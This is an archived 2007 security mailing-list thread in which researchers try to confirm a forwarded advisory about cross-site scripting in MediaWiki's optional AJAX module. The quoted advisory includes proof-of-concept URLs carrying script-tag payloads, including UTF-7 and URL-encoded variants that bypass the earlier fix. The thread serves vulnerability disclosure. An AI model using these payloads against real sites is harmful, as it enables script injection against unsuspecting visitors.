[VIM] [unsure] MediaWiki Cross-site Scripting
Sullo
sullo at cirt.net
Wed Feb 21 00:32:47 EST 2007
And I stand corrected:
An XSS injection vulnerability based on Microsoft Internet Explorer's
UTF-7 charset autodetection was located in the AJAX support module,
affecting MSIE users on MediaWiki 1.6.x and up when the optional setting
$wgUseAjax is enabled.
...
http://svn.wikimedia.org/svnroot/mediawiki/tags/REL1_9_3/phase3/RELEASE-NOTES
Sullo wrote:
> $wgUseAjax is off by default--in fact in my install I don't even have
> that in the config file.
>
> I didn't try very hard, but I couldn't get it to work either (after
> turning wgUseAjax on).
>
>
> Noam Rathaus wrote:
>
>> Anyone able to confirm this? I can't.
>>
>> ---------- Forwarded Message ----------
>>
>> Subject: MediaWiki Cross-site Scripting
>> Date: Tuesday 20 February 2007 06:29
>> From: eyal at bugsec.com
>> To: bugtraq at securityfocus.com
>>
>> MediaWiki Cross-site Scripting
>>
>> Vulnerabilities.
>>
>>
>> Date:
>> 18/02/2007
>>
>> Vendor:
>> MediaWiki
>>
>> Vulnerable versions:
>> MediaWiki 1.9.2 (latest) and below.
>>
>> Description:
>> MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting
>> attack by expliting the experimental AJAX features, if enabled (default).
>> This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1,
>> 1.9.2). This fix can be bypassed by encoding the XSS exploit to UTF-7. note:
>> browsers encoding auto-detection has to be enabled for successful
>> explitation.
>>
>>
>> Proof-of-concept:
>> http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
>> UTF-7 XSS in post 1.8.2 versions.
>>
>> Examples:
>> v1.8.2 and below:
>> http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://w
>> ww.bugsec.com')%3C/script%3E v1.8.3 - v1.9.2
>> http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http
>> ://www.bugsec.com');+ADw-/SCRIPT+AD4-
>> http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%5
>> 4%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%
>> 43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
>>
>>
>> Credit:
>> Moshe BA from BugSec
>> Tel:+972-3-9622655
>> Email: Info [^A-t] BugSec \*D.O.T*\ com
>> BugSec LTD. - www.BugSec.com
>> http://www.bugsec.com/articles.php?Security=24
>>
>> -------------------------------------------------------
>>
>>
>>
>
>
>
--
http://www.cirt.net/ | http://www.osvdb.org/
More information about the VIM
mailing list